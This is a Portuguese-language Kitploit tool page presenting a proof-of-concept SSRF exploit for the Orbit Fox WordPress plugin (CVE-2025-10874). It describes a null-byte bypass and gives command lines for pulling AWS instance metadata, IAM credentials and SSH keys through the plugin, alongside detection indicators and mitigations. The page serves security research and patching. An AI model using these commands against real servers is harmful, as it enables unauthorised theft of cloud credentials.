Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Orbit-Fox_SSRF_CVE-2025-10874 — Demonstra SSRF com injeção de byte nulo para contornar o CVE-2025-10874 | Kitploit
Ferramentas/GitHubGitHub/ryanmroth/orbit-fox_ssrf_cve-2025-10874
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAprendizado e Educação
GitHubryanmroth/orbit-fox_ssrf_cve-2025-10874

Orbit-Fox_SSRF_CVE-2025-10874

Demonstra SSRF com injeção de byte nulo para contornar o CVE-2025-10874

Ver Repositório
há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

alt text

CVE-2025-10874 - Prova de Conceito de SSRF no Orbit Fox

Exploit de prova de conceito demonstrando a vulnerabilidade de Server-Side Request Forgery (SSRF) no plugin Orbit Fox para WordPress com bypass de injeção de byte nulo.

Post detalhado no blog: https://ryanmroth.com/articles/orbit-fox-ssrf

Detalhes da Vulnerabilidade

DetalheNotas
ID do CVE:CVE-2025-10874
Plugin Afetado:Orbit Fox by ThemeIsle
Tipo de Vulnerabilidade:Server-Side Request Forgery (SSRF) (CWE-918)
Pontuação CVSS:5.5 (média)
Privilégios Necessários:Autor+ (função de Autor do WordPress ou superior)
Versão Corrigida3.0.2+

Descrição

A funcionalidade de importação MyStock do plugin Orbit Fox contém uma vulnerabilidade de SSRF que permite que usuários autenticados com privilégios de Autor+ façam requisições HTTP arbitrárias a partir do servidor WordPress. A vulnerabilidade existe na ação AJAX handle-request-mystock-import, que não valida e sanitiza adequadamente os parâmetros de URL.

O exploit utiliza um bypass de injeção de byte nulo (%00.txt) para contornar a validação de URL, permitindo acesso a serviços internos de metadados, APIs de provedores de nuvem e outros recursos de rede acessíveis a partir do servidor.

Cenários Comuns de Ataque

Extração de Metadados do AWS EC2

  • Hostname da instância: http://169.254.169.254/latest/meta-data/hostname
  • Credenciais IAM: http://169.254.169.254/latest/meta-data/iam/security-credentials/
  • Chaves públicas SSH: http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

Instalação

Requisitos

  • Python 3.7+
  • Biblioteca requests
  • Biblioteca urllib3

Configuração

root@kitploit:~
# Clonar o repositório
git clone <repository-url>
cd Orbit-Fox_SSRF_CVE-2025-10874

# Instalar dependências (usando uv)
uv sync

# Ou usando pip
pip install requests urllib3

Uso

Uso Básico

root@kitploit:~
# Extrair hostname da instância AWS (alvo padrão)
python orbit_fox_poc.py http://target.com -u author -p password123

# Especificar URL de destino SSRF personalizada
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/hostname

Exemplos Avançados

root@kitploit:~
# Extrair credenciais de função IAM
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Extrair chave pública SSH
python orbit_fox_poc.py http://target.com -u author -p password123 \
  -s http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

# Testar sem bypass de byte nulo (falhará em versões corrigidas)
python orbit_fox_poc.py http://target.com -u author -p password123 --no-nullbyte

# Ativar saída de depuração para solução de problemas
python orbit_fox_poc.py http://target.com -u author -p password123 --debug

Opções de Linha de Comando

root@kitploit:~
argumentos posicionais:
  target                URL do WordPress alvo (ex.: http://example.com)

argumentos obrigatórios:
  -u, --username        Nome de usuário do WordPress (função Autor+ necessária)
  -p, --password        Senha do WordPress

argumentos opcionais:
  -h, --help            Mostrar mensagem de ajuda e sair
  -s, --ssrf-url        URL para solicitar via SSRF
                        (padrão: http://169.254.169.254/latest/meta-data/hostname)
  --no-nullbyte         Desativar bypass de byte nulo (testar apenas SSRF básico)
  --debug               Ativar saída de depuração para solução de problemas

Como Funciona

  1. Autenticação: Autentica no WordPress usando as credenciais fornecidas
  2. Obtenção de Nonce: Extrai o nonce de segurança do painel administrativo do WordPress
  3. Injeção de Byte Nulo: Acrescenta %00.txt à URL de destino para contornar a validação
  4. Execução do SSRF: Envia requisição manipulada para o endpoint AJAX handle-request-mystock-import
  5. Recuperação de Conteúdo: Busca e exibe o conteúdo recuperado da biblioteca de mídia do WordPress

Detecção

Indicadores de Log

  • Requisições HTTP de saída incomuns para serviços de metadados (169.254.169.254)
  • Requisições para admin-ajax.php com a ação handle-request-mystock-import
  • Uploads na biblioteca de mídia do WordPress a partir de URLs internas/de metadados

Mitigação

  • Atualizar o Orbit Fox para a versão 3.0.2 ou posterior
  • Implementar filtragem estrita de tráfego de saída no servidor WordPress
  • Monitorar e restringir o acesso aos endpoints de metadados da nuvem
  • Revisar funções de usuário e limitar privilégios de Autor+

Divulgação Responsável

Esta vulnerabilidade foi divulgada de forma responsável ao fornecedor e foi corrigida na versão 3.0.2 do Orbit Fox. Esta prova de conceito é fornecida para:

  • Pesquisa e testes de segurança
  • Avaliação de vulnerabilidades em sistemas autorizados
  • Fins educacionais

Aviso Legal

SOMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados. O acesso não autorizado a sistemas de computador é ilegal. Os usuários devem:

  • Obter permissão explícita por escrito antes de testar
  • Usar apenas em sistemas que você possui ou tem autorização para testar
  • Cumprir todas as leis e regulamentos aplicáveis

O autor não assume nenhuma responsabilidade pelo uso indevido desta ferramenta.

Referências

  • Vulnerabilidade Original Alex Sanford – CVE-2023-2287
  • Detalhes do CVE: CVE-2025-10874
  • Repositório do Plugin: Orbit Fox by ThemeIsle
  • Serviço de Metadados AWS: Instance Metadata Service

Última Atualização: 2025-10-06

Baixar ferramenta